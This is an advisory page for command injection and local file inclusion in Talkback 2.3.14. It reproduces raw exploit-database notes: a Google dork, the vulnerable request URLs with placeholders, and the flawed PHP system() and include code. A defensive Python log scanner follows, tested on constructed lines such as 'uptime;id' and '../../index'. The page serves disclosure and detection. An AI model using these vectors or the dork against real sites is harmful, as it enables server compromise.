Vendor: Talkback
By: milw0rm.com
CVSS: 9.3 (HIGH)
CWE: 78 (Command Injection)
Product Name: Talkback
Affected Version From: 2.3.14
Affected Version To: 2.3.14
Patch Exists: YES
Related CWE: N/A
CPE: a:oldguy:talkback:2.3.14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Talkback V 2.3.14

The Talkback V 2.3.14 script is vulnerable to command injection. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'result' parameter in the 'talkback/addons/import.php' script. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system with the privileges of the web server process.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.
Source

Exploit-DB raw data:

JIKO No-exploit.Com
Download:http://scripts.oldguy.us/talkback/downloads2/talkback2.3.14.zip
Script : talkback V 2.3.14
Dork:inurl:test.php Powered by TalkBack
--------------------------------------------
Edit Comment ~[+]
talkback/comments.php?edit=1&edit_id=2&
Command ~[+]
talkback/addons/import.php?result=[Command]
        Code;
        $last_line = system($command, $result);
Local File ~[+]
        Note: if the install folder has not been deleted
http://localhost/test/talkback/install/help.php?language=[File]
    code;
        $file = "../language/{$_REQUEST['language']}.php";
    if (!is_file($file))
        exit("Language file '$file' does not exist");
    include ($file);

# milw0rm.com [2009-07-09]
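Added example, not part of the advisory or of the Talkback code: a small Python hunt over web-server access logs that flags requests to the two endpoints named on this page, addons/import.php with a result parameter and install/help.php with a language parameter, and grades each hit by whether the decoded value carries shell metacharacters or a path traversal. The log lines, client addresses and timestamps are constructed, and the pattern for a legitimate language code is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Common/combined log format; only client, timestamp and request target are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')
# Shell metacharacters in the decoded 'result' value raise confidence from medium to high.
SHELL_META = re.compile(r'[;&|`$<>\n]')
# Assumed shape of a legitimate language selector, e.g. "en" or "pt_br".
LANG_CODE = re.compile(r'^[A-Za-z]{2}(?:_[A-Za-z]{2})?$')

# Endpoint path suffix -> (query parameter, rule name), taken from the advisory above.
RULES = {
    '/addons/import.php': ('result', 'command-injection'),
    '/install/help.php': ('language', 'local-file-inclusion'),
}

def severity(rule, value):
    if rule == 'command-injection':
        # Any request to this endpoint deserves a look; metacharacters make it near-certain.
        return 'high' if SHELL_META.search(value) else 'medium'
    if '../' in value or '..\\' in value or not LANG_CODE.match(value):
        return 'high'
    return 'low'  # plausible language code, but the install directory is still reachable

def analyse(line):
    """Findings for one access-log line; empty list if benign or unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group('target'))
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    findings = []
    for suffix, (param, rule) in RULES.items():
        if url.path.lower().endswith(suffix) and param in params:
            for value in params[param]:
                findings.append({'ip': m.group('ip'), 'ts': m.group('ts'), 'rule': rule,
                                 'severity': severity(rule, value), 'value': value})
    return findings

def scan(lines):
    return [f for line in lines for f in analyse(line)]

# Constructed sample log lines (not real traffic); paths follow the advisory.
SAMPLE_LOG = [
    '10.0.0.5 - - [09/Jul/2009:10:00:01 +0000] "GET /talkback/comments.php?edit=1&edit_id=2 HTTP/1.1" 200 512',
    '10.0.0.5 - - [09/Jul/2009:10:00:07 +0000] "GET /talkback/addons/import.php?result=uptime HTTP/1.1" 200 120',
    '10.0.0.5 - - [09/Jul/2009:10:00:09 +0000] "GET /talkback/addons/import.php?result=uptime%3Bid HTTP/1.1" 200 160',
    '10.0.0.9 - - [09/Jul/2009:10:01:00 +0000] "GET /test/talkback/install/help.php?language=en HTTP/1.1" 200 900',
    '10.0.0.9 - - [09/Jul/2009:10:01:03 +0000] "GET /test/talkback/install/help.php?language=../../index HTTP/1.1" 200 2048',
]
```

Running `scan(SAMPLE_LOG)` yields four findings: medium and high for the two import.php requests, low and high for the two help.php requests; the benign comments.php line produces none.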